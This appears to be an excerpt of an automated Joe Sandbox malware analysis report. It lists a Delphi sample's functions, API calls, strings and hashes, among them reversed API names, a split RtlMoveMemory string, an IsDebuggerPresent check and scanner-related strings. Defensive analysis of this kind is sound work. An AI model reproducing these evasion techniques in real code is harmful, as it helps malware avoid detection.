                                                                                                                                          • Opcode Fuzzy Hash: 891113bbb035af123a09c9c0d32621887dfd9263a54834c933df4e932387b6bf
                                                                                                                                          • Instruction Fuzzy Hash: 84A1C330A04264AFDF21AB2ECCC4BD9B6F5EB09354F1440E5ED49AB285CF758989CF51
                                                                                                                                          Function 02A9252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • , xrefs: 02A92814
                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 02A92690
                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A92849
                                                                                                                                          • 7, xrefs: 02A926A1
                                                                                                                                          • bytes: , xrefs: 02A9275D
                                                                                                                                          • Unexpected Memory Leak, xrefs: 02A928C0
                                                                                                                                          • The unexpected small block leaks are:, xrefs: 02A92707
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                          • Opcode ID: d1e305314adc4ae151d57110c9b8fee4e64b3c7e3e8e15ddd4ff1eb4b17b573f
                                                                                                                                          • Instruction ID: c8de3e9445e77084d75ace712584849f70ed8313cffa4df5cb7b45f548cb47ac
                                                                                                                                          • Opcode Fuzzy Hash: d1e305314adc4ae151d57110c9b8fee4e64b3c7e3e8e15ddd4ff1eb4b17b573f
                                                                                                                                          • Instruction Fuzzy Hash: 0F71B230A042A89FDF219B2ECC84BD9BAF5EB09354F5040E5D949EB281DF754AC9CF51
                                                                                                                                          Function 02A9BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,02A9C08B,?,?,00000000,00000000), ref: 02A9BDF6
                                                                                                                                            • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                          • Opcode ID: f173d354efb2745feef18e4a983958421ed1c4196018ea939c5f23f38e97388b
                                                                                                                                          • Instruction ID: 4435f968047153ba97a3d1aa0f40093c101855c958cf891eef45e45b8d625f19
                                                                                                                                          • Opcode Fuzzy Hash: f173d354efb2745feef18e4a983958421ed1c4196018ea939c5f23f38e97388b
                                                                                                                                          • Instruction Fuzzy Hash: 85613F34B502489BDF00EBA6DA90B9FB7FB9B8C700F509836A1019B745DE39DD068F65
                                                                                                                                          Function 02A9435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8,?,?,02ABE7A8,02A965B1,02ABD30D), ref: 02A94395
                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8,?,?,02ABE7A8,02A965B1,02ABD30D), ref: 02A9439B
                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,02A943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8), ref: 02A943B0
                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,02A943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?), ref: 02A943B6
                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A943D4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                          • Opcode ID: 7ce6d39484e07ff8f6e4e14d0d0f10077390e10e64d6aa329f9e977720ea6efd
                                                                                                                                          • Instruction ID: 942beda77cac2fad8129d0e4bbf4e5d853dba32eb2a48f56b9ec09ef8d45e286
                                                                                                                                          • Opcode Fuzzy Hash: 7ce6d39484e07ff8f6e4e14d0d0f10077390e10e64d6aa329f9e977720ea6efd
                                                                                                                                          • Instruction Fuzzy Hash: 83F02B70AD4300B5FE11A3727E46F9A23EC9708F51FA00A49B314594D1DFE440C98F51
                                                                                                                                          Function 02A9AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A9AD59
                                                                                                                                            • Part of subcall function 02A9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A9AD7D
                                                                                                                                            • Part of subcall function 02A9AD3C: GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A9AD98
                                                                                                                                            • Part of subcall function 02A9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A9AE2E
                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02A9AEFB
                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF18
                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF1E
                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,02A9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF33
                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,02A9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF39
                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A9AF5B
                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A9AF71
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                          • Opcode ID: 4b744950a891a92c8b3ba510d5af0423a2e36ec14d982a5ca6f98cd6fb5ba1f3
                                                                                                                                          • Instruction ID: 2edc53b63e6f6d453c9dace00131e4f5db8615b17da54b03bd99a66899f68f50
                                                                                                                                          • Opcode Fuzzy Hash: 4b744950a891a92c8b3ba510d5af0423a2e36ec14d982a5ca6f98cd6fb5ba1f3
                                                                                                                                          • Instruction Fuzzy Hash: D4114CB2584200BADA00FBA9CE85F9B77EDAF44B00F804916B754D70D1DE75E9448B62
                                                                                                                                          Function 02A9E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A9E625
                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A9E641
                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A9E67A
                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A9E6F7
                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A9E710
                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 02A9E745
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                          • Instruction ID: 2f88667127f601bc06bc9b028ff2ade70245f4257435c5f8e935aa21192d9156
                                                                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                          • Instruction Fuzzy Hash: 3751F9759416299BCF22EB59CA80BD9B3FDAF49300F4045D6E608E7212DE30AF858F61
                                                                                                                                          Function 02A93598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A935BA
                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A935ED
                                                                                                                                          • RegCloseKey.ADVAPI32(?,02A93610,00000000,?,00000004,00000000,02A93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A93603
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                          • Opcode ID: 528d04ce52442bb5b88d6e5514b5366e3294d42e91dae182e2d08e470f45e631
                                                                                                                                          • Instruction ID: d19c18b2875718523de3022d9b1af9b16f280837b210bb4e0b70e4418b1f0eae
                                                                                                                                          • Opcode Fuzzy Hash: 528d04ce52442bb5b88d6e5514b5366e3294d42e91dae182e2d08e470f45e631
                                                                                                                                          • Instruction Fuzzy Hash: 2A01B575984218BAEF11DBD28E42BBEB7FCE708B00F5005A1BB04D6680EE74A511CA59
                                                                                                                                          Function 02AA8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                                                                          • API String ID: 667068680-1372893251
                                                                                                                                          • Opcode ID: eab24ca62eafe967a4151033a9a692d8b760b86ba85c03048fa3dbafce73f8d2
                                                                                                                                          • Instruction ID: 74bf214b170fc22654b9a340d8857e74a9909bb031bf1cd0503a9a563e71e631
                                                                                                                                          • Opcode Fuzzy Hash: eab24ca62eafe967a4151033a9a692d8b760b86ba85c03048fa3dbafce73f8d2
                                                                                                                                          • Instruction Fuzzy Hash: AD012C75680304BFEB04EBA5ED51A5EB7EEFB4CB00F9184A0B90097600DF74AA01DA24
                                                                                                                                          Function 02A9AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02A9AAE7,?,?,00000000), ref: 02A9AA68
                                                                                                                                            • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A9AAE7,?,?,00000000), ref: 02A9AA98
                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02A9AAA3
                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A9AAE7,?,?,00000000), ref: 02A9AAC1
                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02A9AACC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                          • Opcode ID: e22dc5ee43eb6af948e45a1e6ee5e873e11bc5f725b5e6c6541f25c6a87d11b3
                                                                                                                                          • Instruction ID: f89359dac0958e06ff9940f29ed28f2e2ba0540ef65726aa1bc77b11ac4153b7
                                                                                                                                          • Opcode Fuzzy Hash: e22dc5ee43eb6af948e45a1e6ee5e873e11bc5f725b5e6c6541f25c6a87d11b3
                                                                                                                                          • Instruction Fuzzy Hash: 6101F2B12802447FFF11AA67CE11B6A77EDEF86B10F610162F600E6AC1DE759E008A64
                                                                                                                                          Function 02A9AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02A9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A9AB2F
                                                                                                                                            • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                          • Opcode ID: 1b75578d3c6ec16bd62246bf5a441eb43a5a69f774c831892d4a324827040cea
                                                                                                                                          • Instruction ID: 9e49d315b469e03a9a4e987ef9a5aac63c41655a193bbff3831901ec15d5a2df
                                                                                                                                          • Opcode Fuzzy Hash: 1b75578d3c6ec16bd62246bf5a441eb43a5a69f774c831892d4a324827040cea
                                                                                                                                          • Instruction Fuzzy Hash: 3041E5717442088BDF11EBBB89902BEB3FBDB8A304B504527D542CB346EE35ED02CA65
                                                                                                                                          Function 02AA7E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • RtlMoveMemory.NTDLL(?,?,?), ref: 02AA7ED7
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryMove
                                                                                                                                          • String ID: Ntdll$RtlM$oveM
                                                                                                                                          • API String ID: 2705147948-1610840992
                                                                                                                                          • Opcode ID: 00658a5162e8bccfb4a3541ee9eb5e7168d7f2a14989c0cbad0e8233290afe40
                                                                                                                                          • Instruction ID: 375f5a72ca329a4cdb792a319f26c3b1318800d294075ecf4b176711e91aee66
                                                                                                                                          • Opcode Fuzzy Hash: 00658a5162e8bccfb4a3541ee9eb5e7168d7f2a14989c0cbad0e8233290afe40
                                                                                                                                          • Instruction Fuzzy Hash: 8A015A707C0344BFFA00EB95ED22F2FB7E9EB49B00F9084A1B90197640DF74AE119A24
                                                                                                                                          Function 02AA81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc
                                                                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                          • API String ID: 1883125708-1952140341
                                                                                                                                          • Opcode ID: eee05e3561aac59aaa1c7b97678d083fd3a6e1938bfd66f4d8b8c487d49ad681
                                                                                                                                          • Instruction ID: 4a87d48e0bb5f353cf2988d18cfb93a065f6d86d815b782bf379678784337e18
                                                                                                                                          • Opcode Fuzzy Hash: eee05e3561aac59aaa1c7b97678d083fd3a6e1938bfd66f4d8b8c487d49ad681
                                                                                                                                          • Instruction Fuzzy Hash: D4F06271AC4704AFEB00EBA5ED2196AF7EEFF4A7407914460B81083610DF34AE159924
                                                                                                                                          Function 02AAF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,02AAFAEB,UacInitialize,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize), ref: 02AAF6EE
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02AAF700
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                          • Opcode ID: 8100d5e22fbf6889957ddad790a0f50a9d15af5a432100877e31aed17c0a2c68
                                                                                                                                          • Instruction ID: ea06a14a78ca0f846de6b129620dd6f3575876126530d87d4b390a75ad817b5d
                                                                                                                                          • Opcode Fuzzy Hash: 8100d5e22fbf6889957ddad790a0f50a9d15af5a432100877e31aed17c0a2c68
